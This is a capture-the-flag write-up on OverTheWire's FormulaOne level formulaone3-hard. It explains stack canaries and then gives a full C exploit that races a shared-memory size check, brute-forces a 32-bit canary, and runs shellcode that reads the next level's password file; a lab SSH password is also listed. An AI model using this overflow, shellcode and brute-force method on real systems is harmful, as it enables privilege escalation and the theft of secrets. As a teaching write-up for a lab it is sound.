FormulaOne: Level 2 -> Level 3 (hard)

🚨

Spoiler alert: This post contains spoilers for overthewire's FormulaOne game. If you would like to solve this challenge on your own, then don't read ahead.

Background

This is the fifth part in a series of posts on overthewire's FormulaOne game. If you'd like to read the earlier posts, you can do so here:

Goal

In the last post, we successfully retrieved the password by exploiting formulaone3. We could stop there and continue to the next level. But before we do that, we'll have a go at exploiting formulaone3-hard. As the name suggests, this is a harder to exploit version of formulaone3.

Exploitable Code

For reference, here is the source code for formulaone3.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <linux/shm.h>
#include <time.h>

// Four hardcoded memory address keys
unsigned int keys[] = {0xADCADC00, 0xADC00ADC, 0x00ADCADC, 0x0ADCADC0};

// The shared memory key to use. It will always be one of the four above
unsigned int SHMKEY;

// A struct that defines the size and content of a message
struct msg {
  int sz;
  char ptr[1024]; // Notice the buffer size is 1024
} msg;

struct msg *echo;

void doecho(){
  int shmid;
  char buf[256]; // Notice the buffer size is 256

  // Gets the id of the shared memory segment. 
  // Will create the segment if it does not yet exist
  shmid = shmget(SHMKEY, 8192, IPC_CREAT | 0777);

  // Attach to the shared memory, and read the address pointer to the shared mem segment
  echo = shmat(shmid, NULL, SHM_EXEC);

  // If sz is not zero
  if( echo->sz ) {
    // If sz is less than the size of buf (256)
    if( echo->sz < sizeof(buf)) {
      // Copy the shared memory segment to buf, and print to stdout
      printf("The msg is...\n");
      memcpy(buf, echo->ptr, echo->sz);
      printf("%s\n",buf);
    }
  }
}

int main(int argc, char *argv[]){
  // If user provides no input, do nothing
  if(!argv[1])return 0;

  // argv[1][0] gets the first character of the users input
  // &3 is a bitwise and operation
  // Basically, this does some bitwise math and guarantees that no matter
  // the user input, SHMKEY will be either 0, 1, 2 or 3
  // Essentially this is a modulo
  SHMKEY= keys[argv[1][0]&3];
  doecho();
}

The comments added are my own.

Setup

ssh formulaone2@formulaone.labs.overthewire.org -p 2232

Enter the password when prompted. At the time of this writing, it was: OvQAKUM3BrvbH4pKjBJBCOUpTGSDjNum

Stack Smashing Detected

First we need to identify what makes exploiting formulaone3-hard more difficult. If we run the same exploit we used against formulaone3 we'll see the following:

FormulaOne3-hard Stack Smash Detected (light)

The hard version has stack smashing protections

Let's see what checksec shows us:

$ checksec --file=/formulaone/formulaone3-hard
RELRO         Partial RELRO
STACK CANARY  Canary found  # The stack contains a canary value 
NX            Nx enabled    # The stack is not executable
PIE           No PIE
RPATH         No RPATH
RUNPATH       No RUNPATH
Symbols       46 Symbols
FORTIFY       No
Fortified     0
Fortifiable   1
FILE          /formulaone/formulaone3

The presence of a stack canary is what differentiates the hard version

Stack Canary

To deal with an attacker overflowing a buffer (as we did in the previous post), GCC introduced StackGaurd. StackGuard and similar implementations work by inserting a few bytes, known as a stack canary, between stack variables (buffers) and a functions return address. An attacker that overflows the buffer into the function return address will necessarily overwrite the canary. Before the function returns, a comparison is done to check if the canary value has changed. If that value has changed, then the program execution will terminate.

        | Bottom of memory  |
        |                   |
        | Top of stack      |
        |                   |
        | buffer 2          |
        | buffer 1          |
        | Canary            |
        | Return address    |
        |                   |
        | Bottom of stack   |
        |                   |
        | Top of memory     |

A minimal example of the stack

Types of Canary's

The length of a canary is typically aligned with the word size of the target system architecture. For 32 bit systems, thats 4 bytes, and for 64 bit systems, that's 8 bytes. It is possible to compile a 32 bit program on a 64 bit system, in which case the size of the canary will be 4 bytes rather than 8.

Generally a canary can be one of three types. String terminator, random, and xor-random.

String Terminator Canary

There are a lot of string functions in C that are vulnerable to overflow, strcpy() for example. A string terminator canary will contain bytes that prevent a string from overflowing. String terminator canary's will defeat most buffer overflow attacks that rely on string functions.

0x00 # null
0x0d # CR
0x0a # LF
0xff # EOF

The most common string terminators

Random Canary

String functions are not the only functions that can be vulnerable to buffer overflows, memcpy() for example. To protect against most other vulnerable functions, a random canary is used. This canary is generated at runtime and is unique to each function call. Because the bytes are random it is difficult (though not impossible) for an attacker to predict what the canary will be.

In a 32 bit process, the canary is 4 bytes, and in a 64 bit process, the canary is 8 bytes. The first byte is typically null, with the remaining bytes (3 and 7, respectively) chosen randomly. The number of possible canary values in a 64 bit process is so large that it's effectively impossible to brute force. But, this isn't the case for a 32 bit process.

🧮

There are 256 possible values for each byte. In a 32 bit process there are $256^3 = 16,777,216$ possible canary values. In a 64 bit process, this number is $256^7 = 72,057,594,037,927,936$ .

XOR-Random Canary

The XOR-Random canary is a variation of the random canary. The first byte is null, and the remaining bytes are generated randomly. The difference is that the canary is XOR'd with a value that is known to the program. This value is typically a pointer to a global variable. The canary is XOR'd with this value before being stored on the stack. When the function returns, the canary is XOR'd with the same value.

Bypassing a Stack Canary

There are a few ways to bypass a stack canary. The possibilities available to an attacker depend on the type of canary used. For example, if the canary is a string terminator, but the vulnerable function is not a string function (e.g. memcpy()), then the canary can be bypassed by including the terminator in the buffer payload. Unfortunately, we aren't so lucky in this case. The canary that we are dealing with is a random canary.

Another way to bypass a canary is to leak the value at runtime so that it can be included in the payload. The most common way to do this is via a format string vulnerability. This is an option when a program uses printf() to print user input, but does not specify the format. An attacker can therefore provide their own format, perhaps %x, and leak the canary value. But, in the challenge code we are dealing with, there is no such vulnerability.

The last option is to brute force the canary. As mentioned earlier, this is actually feasible on a 32 bit process. In some cases, it's even possible to brute force one byte at a time. When a process forks, the canary may be inherited from the parent process. If the canary is inherited from the parent process, then each time a child is forked, it has same canary value. This dramatically shrinks the number of guesses that an attacker needs to make, from 256^3 to 256 * 3. Unfortunately, our challenge code does not fork, so a standard brute force is required.

Brute Forcing the Canary

Even with the smaller guess space, brute forcing will still be time consuming. We know there are ~16 million possible canary's but it will be helpful to calculate how long we can expect the brute force to take on average.

To that end, we'll need the following information:

Roughly how long does a guess attempt take?
Roughly how often does the race condition work in our favor?

Average Time/Attempt

There are a lot of ways to approach this but a straightforward method is to let the brute force script run for 30 seconds to a minute, and have it count how many attempts it completed in that span.

In my testing we can expect roughly: $\frac{attempts}{timespan} = \frac{1,200}{second} = \frac{72,000}{minute} = \frac{4,320,000}{hour}$

Race Condition Hit Rate

Recall that our exploit must first win the race condition that's made possible by this line:

if( echo->sz < sizeof(buf))

We need to determine how often we can win that race condition, and we also need to optimize the odds of winning the race condition as much possible. It turns out that most attempts will not successfully win the race condition. And while it is possible to increase the success rate, the upper limit for my exploit is only ~2.5%.

It's trivial to determine the success rate by counting the number of times we see "stack smashing detected" in the vulnerable programs output, per 1000 attempts.

Recall that winning the race condition involves:

setting the buffer size (echo->sz) to 255
sleeping for a very small amount time
setting the buffer size (echo->sz) to a number greater than 255

For a sleep value of 100 us, the race condition is won around ~1% of time.

Optimizing the Race Condition Hit Rate

We can setup our script to automatically find the "optimal" sleep time, with a simple algorithm:

track the success rate across 1000 attempts (number of times "stack smashing detected" was observed)
adjust the sleep time up/down by 10 us
compare the success rate of the new sleep with that of the old sleep
if the success rate improves, continue adjusting the sleep in that direction
otherwise, adjust the sleep in the opposite direction

You'll know the "optimal" sleep is found when the success rate stops improving. In my testing, the optimal sleep is between 380 and 415 us. Unfortunately, the upper limit of success with this method is only ~2.5%.

FormulaOne3-hard race condition success rate (light)

The success rate of the race condition with this method tops out around 2.5%

It is possible to increase the odds of hitting the race condition if the toggling of the sz variable is done in a separate process with a busy-loop. In my testing, this increased the likelihood of hitting the race condition to ~12%. The trade-off though, is the busy-loop degrades the performance of the brute forcing process quite significantly. Instead of 1200/attempts per second, we observe around 200 attempts per second.

Estimated Time to Succes

We've got what we need to estimate how long it will take us to brute force the canary.

1,200 attempts per seconds (4,320,000 per hour)
2.5% of attempts are "valid" in the sense that they win the race condition
16,777,216 possible canary values
But on average, we should only need half that many guesses (8,388,608)

$8,388,688 \div (\frac{4,320,000}{\text{hour}} * 2.5\% ) \approx 78\ \text{hours}$

Average time to brute force the 3 byte canary 😲

78 hours is still doable but really not ideal. If we had to brute force 4 bytes instead of 3, we would definitely need to rethink our approach. Brute forcing a 4 byte canary would take 256 times longer:

$2,147,483,648 \div (\frac{4,320,000}{\text{hour}} * 2.5\% ) \approx 19,884\ \text{hours} \approx 829\ \text{days}$

Brute forcing a 4 byte canary is unfeasible here

Brute Force Script

And finally, we have our script to brute force the canary! There's a lot of room for improvement, but this does work. Granted, it will need to run for 78 hours on average.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <signal.h>
#include <time.h>
#include <ctype.h>
#include <errno.h>

#define SHM_SIZE 8192
#define BUFFER_SIZE 256
#define PAYLOAD_SIZE 280
#define NOP 0x90

// Offsets in our payload (relative to shared_memory->ptr)
#define CANARY_OFFSET BUFFER_SIZE      // at offset 256, where the canary is expected
#define RET_OFFSET 272                   // return address overwritten at offset 272

// The 4 keys used to compute the shared memory key
unsigned int keys[] = {0xADCADC00, 0xADC00ADC, 0x00ADCADC, 0x0ADCADC0};

struct msg {
    int sz;
    char ptr[1024];
};

// Shellcode to execute "cat /etc/formuloane_pass/formulaone3"
const char shellcode[] =
    "\x6a\x01\xfe\x0c\x24\x68\x6f\x6e\x65\x33"
    "\x68\x6d\x75\x6c\x61\x68\x2f\x66\x6f\x72"
    "\x68\x70\x61\x73\x73\x68\x6f\x6e\x65\x5f"
    "\x68\x6d\x75\x6c\x61\x68\x2f\x66\x6f\x72"
    "\x68\x2f\x65\x74\x63\x89\xe3\x31\xc9\x6a"
    "\x05\x58\xcd\x80\x6a\x01\x5b\x89\xc1\x31"
    "\xd2\x68\xff\xff\xff\x7f\x5e\x31\xc0\xb0"
    "\xbb\xcd\x80";

// Helper to get current timestamp as a string
void get_timestamp(char *buffer, size_t size) {
    time_t now = time(NULL);
    struct tm *tm_info = localtime(&now);
    strftime(buffer, size, "%Y-%m-%d %H:%M:%S", tm_info);
}

// Helper to detect if the password has been printed
int detect_password(const char *output) {
    size_t len = strlen(output);
    for (size_t i = 0; i <= len - 32; i++) {
        int valid = 1;
        for (int j = 0; j < 32; j++) {
            if (!isalnum((unsigned char)output[i+j])) {
                valid = 0;
                break;
            }
        }
        if (valid) {
            printf("Detected password: %.*s\n", 32, output + i);
            return 1;
        }
    }
    return 0;
}

// Spawn the vulnerable binary (hard version) as a child process and capture stdout
pid_t spawn_vuln(char *arg, int *pipe_fd) {
    int pipefd[2];
    if (pipe(pipefd) < 0) {
        perror("pipe");
        exit(1);
    }
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(1);
    }
    if (pid == 0) {
        // Child process: redirect stdout and stderr to the pipe.
        close(pipefd[0]); // close read end
        dup2(pipefd[1], STDOUT_FILENO);
        dup2(pipefd[1], STDERR_FILENO);
        close(pipefd[1]);
        // Execute the vulnerable binary.
        execl("/formulaone/formulaone3-hard", "formulaone3-hard", arg, NULL);
        perror("execl");
        exit(1);
    }
    
    // Parent process: close write end and return the read end.
    close(pipefd[1]);
    *pipe_fd = pipefd[0];
    return pid;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Missing key argument\n");
        return 1;
    }
    
    // Use the second argument as the initial race_delay if provided - default is 400
    unsigned int race_delay = 400;
    if (argc >= 3) {
        race_delay = (unsigned int) atoi(argv[2]);
    }
    
    // Use the third argument as the initial output_timeout if provided; default is 200000 μs (200 ms).
    unsigned int output_timeout = 200000;
    if (argc >= 4) {
        output_timeout = (unsigned int) atoi(argv[3]);
    }
    
    // Create a unique log file using the process ID.
    char log_filename[64];
    sprintf(log_filename, "exploit_%d.log", getpid());
    FILE *log_file = fopen(log_filename, "a");
    if (!log_file) {
        perror("fopen");
        return 1;
    }
    
    unsigned int SHMKEY = keys[argv[1][0] & 3];
    
    int shmid = shmget(SHMKEY, SHM_SIZE, IPC_CREAT | 0777);
    if (shmid < 0) {
        perror("shmget");
        return 1;
    }
    struct msg *shared_memory = shmat(shmid, NULL, 0);
    if (shared_memory == (void *)-1) {
        perror("shmat");
        return 1;
    }
    
    unsigned long attempt = 0;
    // Counters for the last 1000 attempts for race_delay adaptation.
    unsigned int block_attempts = 0;
    unsigned int block_smashing = 0;

    // Adaptive timing variables for race_delay.
    int last_adjustment = 0;
    double prev_ratio = -1.0;
    const unsigned int step = 10;  // step size in μs for race_delay adjustments.
    
    while(1) {
        // Generate a random 24-bit value and shift left by 8 so that the lowest byte is 0.
        unsigned int rand_val = rand() % 0x1000000;
        unsigned int canary = rand_val << 8;

        attempt++;
        block_attempts++;
        
        // Every 1000 attempts, log metrics
        if (attempt % 1000 == 0) {
            char timestamp[64];
            get_timestamp(timestamp, sizeof(timestamp));
            double current_ratio = (block_attempts > 0) ? (block_smashing * 100.0) / block_attempts : 0.0;
            
            printf("[%s] Attempt %lu: Guessed Canary = 0x%08x, stack smashing ratio = %.2f%%, race_delay = %u μs\n",
                   timestamp, attempt, canary, current_ratio, race_delay);

            fprintf(log_file, "[%s] Attempt %lu: Guessed Canary = 0x%08x, stack smashing ratio = %.2f%%, race_delay = %u μs\n",
                    timestamp, attempt, canary, current_ratio, race_delay);
            
            // --- Adaptive adjustment for race_delay ---
            if (prev_ratio >= 0.0) {
                if (last_adjustment == 0) {
                    // Initial direction: if current_ratio is less than 50%, decrease delay; otherwise, increase.
                    last_adjustment = (current_ratio < 50.0) ? -((int)step) : (int)step;
                } else {
                    if (current_ratio < prev_ratio) {
                        last_adjustment = -last_adjustment;
                    }
                }
                int new_delay = (int)race_delay + last_adjustment;
                if (new_delay < 1) new_delay = 1;
                race_delay = (unsigned int)new_delay;
                fprintf(log_file, "[%s] Race_delay adaptive update: prev_ratio=%.2f, current_ratio=%.2f, last_adjustment=%d, new race_delay=%u μs\n",
                        timestamp, prev_ratio, current_ratio, last_adjustment, race_delay);
            }
            prev_ratio = current_ratio;
            block_attempts = 0;
            block_smashing = 0;
            
            fflush(log_file);
        }
        
        memset(shared_memory->ptr, NOP, PAYLOAD_SIZE);  //NOP sled
        int shellcode_offset = PAYLOAD_SIZE - sizeof(shellcode);
        memcpy(shared_memory->ptr + shellcode_offset, shellcode, sizeof(shellcode));
        
        // Overwrite the canary with our guess.
        *(unsigned int *)(shared_memory->ptr + CANARY_OFFSET) = canary;
        // Overwrite the return address to point into our NOP sled.
        *(unsigned int *)(shared_memory->ptr + RET_OFFSET) = (unsigned int)(shared_memory->ptr + 100);
        
        // Spawn the vulnerable binary (hard version) and capture its output.
        int pipe_fd;
        pid_t child_pid = spawn_vuln(argv[1], &pipe_fd);
        
        /* Trigger the race:
           - First, set echo->sz to a safe value (255).
           - Then, after a delay (race_delay), set it to the overflow value (280).
         */
        shared_memory->sz = 255;
        usleep(race_delay);
        shared_memory->sz = PAYLOAD_SIZE;
        
        // Wait for output using the fixed output_timeout.
        struct timeval tv;
        tv.tv_sec = 0;
        tv.tv_usec = output_timeout;
        fd_set readfds;
        FD_ZERO(&readfds);
        FD_SET(pipe_fd, &readfds);
        int ret = select(pipe_fd + 1, &readfds, NULL, NULL, &tv);
        
        int exploit_succeeded = 0;
        if (ret > 0 && FD_ISSET(pipe_fd, &readfds)) {
            char outbuf[1024];
            int n = read(pipe_fd, outbuf, sizeof(outbuf) - 1);
            if (n > 0) {
                outbuf[n] = '\0';
                char timestamp[64];
                get_timestamp(timestamp, sizeof(timestamp));
                fprintf(log_file, "[%s] Vulnerable output: %s\n", timestamp, outbuf);
                fflush(log_file);
                
                // Check for "stack smashing detected" in the output.
                if (strstr(outbuf, "stack smashing detected") != NULL) {
                    block_smashing++;
                }
                
                // Check if the output contains a valid 32-character alphanumeric password.
                if (detect_password(outbuf)) {
                    get_timestamp(timestamp, sizeof(timestamp));
                    printf("[%s] Exploit succeeded with Canary = 0x%08x on attempt %lu\n", timestamp, canary, attempt);
                    fprintf(log_file, "[%s] SUCCESS: Canary = 0x%08x on attempt %lu\n", timestamp, canary, attempt);
                    fflush(log_file);
                    exploit_succeeded = 1;
                }
            }
        }
        kill(child_pid, SIGKILL);
        waitpid(child_pid, NULL, 0);
        close(pipe_fd);
        
        if (exploit_succeeded)
            break;
    }
    
    fclose(log_file);
    return 0;
}

Conclusion

Stack canary's are quite useful at deterring buffer overflows - that is, assuming the canary cannot be leaked during the programs run time. Even a 4 byte canary (with 3 bytes of entropy) is quite a lot of work to brute force.

The next post in the series will go over the formulaone5 challenge. Without giving too much away, this will be the last post in the formulaone series.